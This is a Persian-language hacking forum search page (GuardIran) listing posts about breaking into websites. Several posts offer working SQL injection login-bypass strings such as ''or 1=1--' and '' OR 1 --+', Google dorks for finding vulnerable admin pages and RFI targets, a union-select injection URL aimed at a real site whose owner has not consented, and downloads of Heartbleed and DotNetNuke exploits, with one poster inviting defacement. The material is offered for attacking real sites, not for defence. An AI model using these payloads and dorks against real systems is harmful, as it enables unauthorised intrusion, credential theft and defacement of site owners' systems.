رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'نفوذ به سایت'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

11 نتیجه پیدا شد

  1. Mehran_FLash
    با سلام امروز یک آموزش ویژه براتون آوردم شما با این روش بدون داشتن نام کاربری و رمز عبور ادمین به سایت نفوذ میکنید ..! این روش فقط روی سایت های asp جواب میده . برای شروع یه سری دورک براتون میذارم . دورک ها : دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تردر موتور های جستجو گر از آن استفاده میکند. "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" خب این از دورک ها . اینم از نام کاربری و رمز ها : '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1-- دقت داشته باشید اگر نام کاربری '=' 'or' باشه پسورد هم '=' 'or' هستش برای مثال نام کاربری : '=' 'or' پسورد : '=' 'or' ================================================== نام کاربری : 'or ' 'x'='x رمز : 'or ' 'x'='x ================================================== خب اگر همه رو امتحان کنید جواب میده. اینم بگم که این ها روی 90% از سایت های asp جواب میدن موفق و پیروز باشید
  2. MR.MSA

    Xpath Injection Vulnerability Training

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری ‌Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید :‌ دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .
  3. s.a.e.e.d
    سلام دوستان یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد نتیجه اسکن دوتا روش تو انجمن دیدم که یکی تزریق این کد بود <script>alert(document.cookie)</script> ولی وقتی اینو تو قسمت عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!! whatweb هم یه سری کوکی بهم داد اینا به کار میان !!! سایت cpanel داره راهی برای نفوذ به cpanel هست !! از ابزار brutesploit میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید 25-53-80-110-119-143 ============================================================================================================================================================== و سایت دوم که باگ sql داشت (این سوال رو یبار پرسیدم ولی جوابی نگرفتم ) من تو قسمت فراخوانی تیبل ادمین مشکل دارم این سایت دارای باگ = [Hidden Content] اینم تمام تیبل هایی که داره = CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE من تیبل USER رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم ! [Hidden Content]/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552-- اساتید لطفا راهنمایی کنید
  4. proxy

    بایپس پیج ادمین

    proxy پاسخی ارسال کرد برای یک موضوع در اکسپلویت های لینوکس

    سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
  5. ElkCloner
    با سلام من میخوام که با استفاده از باگ SQL توی سافت هویج تیبل های یه سایت رو در بیارم ولی ارور Keyword مانع میشه لطفا اگه اطلاعاتی در این مورد دارید که چطور بطرف کنم و توی بخش Keyword جی بنویسیم ممنون
  6. sezar1370
    با سلام خدمت بزرگان گارد ایران بنده یک سایت رو در کالی اسکن کردم با برنامه vega نتیجه اسکن : خوب حالا راهنمایی لازم دارم برای ادامه مسیر نمیدونم چیکار کنم 1 هفته نمیشه با کالی دارم کار میکنم :-(
  7. RT3N
    خب بعد از این چند ماه که از این باگ عظیم رونمایی شده این مدت حرفو حدیث راجع بهش کم شده جای این باگ و اموزشش تو گاردایران خالی بود خواستم آموزش تصویری ازش بزارم اما بهتر دونستم اول توضیحی راجع بهش بدم که کمتر کسایی که هنوز ازش بیخبر هستند با زهنی باز و اطلاعی مناسب به دیدن فیلم آموزشی که قرار میدم بپردازند... خونریزی قلبی (Heartbleed) چیست؟ این نقص یکی از بزرگترین مسائل امنیتی است که اینترنت تاکنون با آن مواجه بوده است. بروس اشنایر، کارشناس امنیتی، این اشکال را “فاجعه‌بار” می‌داند و درباره وخامت آن می‌گوید: “بین ۱ تا ۱۰ به آن نمره ۱۱ می‌دهم این نقص یکی از بزرگترین مسائل امنیتی است که اینترنت تاکنون با آن مواجه بوده است اشکال نرم‌افزاری هارت‌بلید چیست؟ این اشکال در بخشی از یک نرم‌افزار اوپن‌سورس (منبع‌باز) بنام Open SSL وجود دارد که برای رمزگذاری ارتباطات میان کامپیوتر یک کاربر و سرور اینترنت طراحی شده، و در واقع نوعی آشنایی دادن در ابتدای یک مکالمه ایمن است. نام خونریزی قلبی (هارت‌بلید) از آن جهت به آن داده شده که بر یکی از ضمائم SSL تأثیر می‌گذارد که مهندسان به آن نام ضربان قلب داده اند. این یکی از رایج‌ترین ابزارهای رمزگذاری در اینترنت است و تصور می‌شود که حدود دوسوم وب‌سایت‌ها از آن استفاده می‌کنند. اگر در صفحه مرورگرتان علامت یک قفل کوچک را می‌بینید، به احتمال زیاد از SSL استفاده می‌کنید. تصور می‌شود که این اشکال نرم‌افزاری نیم‌میلیون وب‌سایت را تحت تأثیر خود قرار داده باشد. اشکال نرم‌افزاری هارت‌بلید چیست؟ این اشکال در بخشی از یک نرم‌افزار اوپن‌سورس (منبع‌باز) بنام Open SSL وجود دارد که برای رمزگذاری ارتباطات میان کامپیوتر یک کاربر و سرور اینترنت طراحی شده، و در واقع نوعی آشنایی دادن در ابتدای یک مکالمه ایمن است. نام خونریزی قلبی (هارت‌بلید) از آن جهت به آن داده شده که بر یکی از ضمائم SSL تأثیر می‌گذارد که مهندسان به آن نام ضربان قلب داده اند. این یکی از رایج‌ترین ابزارهای رمزگذاری در اینترنت است و تصور می‌شود که حدود دوسوم وب‌سایت‌ها از آن استفاده می‌کنند. اگر در صفحه مرورگرتان علامت یک قفل کوچک را می‌بینید، به احتمال زیاد از SSL استفاده می‌کنید. تصور می‌شود که این اشکال نرم‌افزاری نیم‌میلیون وب‌سایت را تحت تأثیر خود قرار داده باشد. یک پژوهشگر در وبلاگ خود نوشته: “اشکال نرم‌افزاری هارت‌بلید به هرکسی اجازه می‌دهد حافظه سیستم‌هایی که با نسخه‌های آسیب‌پذیر نرم‌افزار Open SSL محافظت می‌شوند را بخواند. این کار کلیدهای مخفی مورد استفاده برای شناسایی ارائه‌کنندگان خدمات و رمزگذاری مبادلات، نام و رمز عبورهای کاربران را در معرض خطر قرار می‌دهد. به این ترتیب مهاجمان می‌توانند ارتباطات را شنود کنند و داده‌ها را بدزدند، و هویت خدمات و کاربران را جعل کنند.” این اشکال نرم‌افزاری آنقدر جدی است که وبسایتی مخصوص آن راه‌اندازی شده که در آن به همه جنبه‌های مشکل پرداخته می‌شود. آیا برای جلوگیری از خسارت از Heartbleed باید رمزهای عبورتان را تغییر دهید ؟ چگونه مطمئن شوم که رمز عبورم قوی است؟ مسأله به رمز عبورهای ضعیف مربوط نمی‌شد، اما فراخوان‌هایی برای تعیین رمز عبورهای جدید به‌راه افتاده است. پروفسور وودوارد، کارشناس امنیت اینترنتی، می‌گوید که مردم باید مرتبا رمزهای عبورشان را تغییر دهند، و باید مطمئن شوند که عبارتی را به‌عنوان رمز عبور انتخاب می‌کنند که به خودشان مربوط نمی‌شود. مثلا نام حیوان خانگی گزینه مناسبی نیست. کلماتی که در فرهنگ‌های لغات وجود دارند مناسبند. البته بهتر است از ترکیبی از کلمات و اعداد استفاده شود. بعضی شرکت‌ها هم جایگزین‌هایی برای رمزهای عبور ارائه می‌کنند. شرکت‌های سازنده تلفن همراه، از جمله اپل و سامسونگ، دستگاه‌های خواننده اثر انگشت را به تلفن‌های خود اضافه کرده اند. این گزینه به کاربران امکان می‌دهد تنها با کشیدن انگشتشان روی صفحه تلفن به خود دستگاه و بعضی کارکردهای آن دسترسی پیدا کنند.
  8. RT3N
    قبل از اینکه فیلم آموزشی رو دریافت کنید اگر آشنایی با این باگ ندارید به تاپیک زیر برید چند خط مطلب راجع به این باگ نوشته شده بخونید وقتتون رو نمیگیره فقط بخاطر آشنایی کاملتون عرض کردم... لینک تاپیک : کلیک کنید در زمان استفاده از این باگ باید صبور باشید اگر مثلا هدفتون بدست اوردن نام کاربری و پسورد سایت مورد نظر هست اگر با بار اول نتیجه نگرفتید باید بارها امتحان کنید... فیلم واضح و ساده هستش... فیلم + اکسبلویت password: guardiran.org heart bleed.rar heart.rar
  9. NeX.LINUX
    ..:: به نام خدا ::.. با ســلام خدمت کاربران محترم و مدیران سایــت امنیتی گــارد ایــران . امروز بنده آموزش یکی از باگ های قدیمی DNN که مخفف شده DotNetNuke است رو برای شما دوستان عزیز قرار می دهم . از دوستان عزیز درخواست میشه که داخل تاپیک سوال نپرسن و اسپم ایجاد نکنند و سوالات را در بخش پرسش و پاسخ نفوذ به سایت ها و سرورها مطرح کنید تاپیک دیگری هم برای دورک های باگ DNN هم زده خواهد شد . با تشکر . پسورد فایل : guardiran.orgDnn Bug Site Hacking.rar
  10. RT3N

    آموزش تصویری fierce

    RT3N پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    این ابزار کالی (fierce) هم جز ابزار هایی هستش که برای تکمیل اطلاعات اولیه راجع به سایت و سرور مورد نظر به نفوذگر (هکر) کمک قابل ستایشی میکنه فیلم مختصر و کوتاه فقط جهت معرفی این ابزار و نحوه ی استفاده از آن میباشد موفق و پیروز باشید پسورد: guardiran.org fierce.rar
  11. rosva
    با سلام میخوام ی اندازه کوچولو درمورد دورک ها (Dork) میدونم بگم و اموزش ساختنش: اول اینکه دورکها عباراتی هستند ک واسه یافتن سایتهای که دارای باگ خاصی بکار میرن و شما برای یافتن تارگتها حتما باید دورک مربوطه را درگوگل جستجو کنید تا به نتیجه مورد نظر خودتون برسید - "*":inurl این عبارت هر چیزی رو که بجای * مینویسید درگوگل در urlسایتها جستجو میکند - "*":intext با این عبارت هر نوشته ای بجای *است رو دربین سایتها توسط گوگل جستجو میکنه - "*":intitle این عبارتم هرچی بجای ستاره است رو در عنوان سایتها توسط گوگل جستجو میکنه inurl:forum- اینم میگه سایتهایی ک تو ادرسشون forumدارن یعنی انجمن دارن رو جستجو کن -inurl:index.php?filename= مثلا این دورک سايت هاي كه داراي باگ RFI اند وداراي يك گزينه هستن رو از گوگل ميخواهد سايتهاي كه در URL شان متن بالا است را پيدا كنه. ولی اگه بخوایم یه سایت رو پیدا کنیم چی یا اینکه یه مجموعه ای از سایت ها با باگ مشخص از ی کشور خاص -"inurl:"/index.php?filename=" site"guardiran.org این دورک سایت گارد ایرانو جستجو میکنه ببینه بینم باگ rfiداره یا نه؟ شما میتونید بجای گارد ایران سایت مورد نظر خودتونو با پسوندش بنویسید -حالاهم مجموعه سایتها از یه کشور خاص مثلا ایران"اینو فقط گفتم چون پسوند سایتهای خارجی رو نمیدونستم خودمونو مثال زدم ولی شما لطفا به سایتهای خودمونی کاری نداشته باشید" -site:.ir inurl:index.php?filename اینم اگه اشتباه نکنم باگ rfiرو تو سایتهای ایرانی جستجو میکنه راستی سایت هم بیانگ سایته طبق دستوراتی ک شما وارد میکنید یه سایت خاص یا مجموعه سایتهای یه کشور طبق بالا و در اخر نمیدونم این مطالب به دردتون میخوره یا نه اگه دیدین میخوره تشکر یادتون نره لطفا
×
×
  • ایجاد مورد جدید...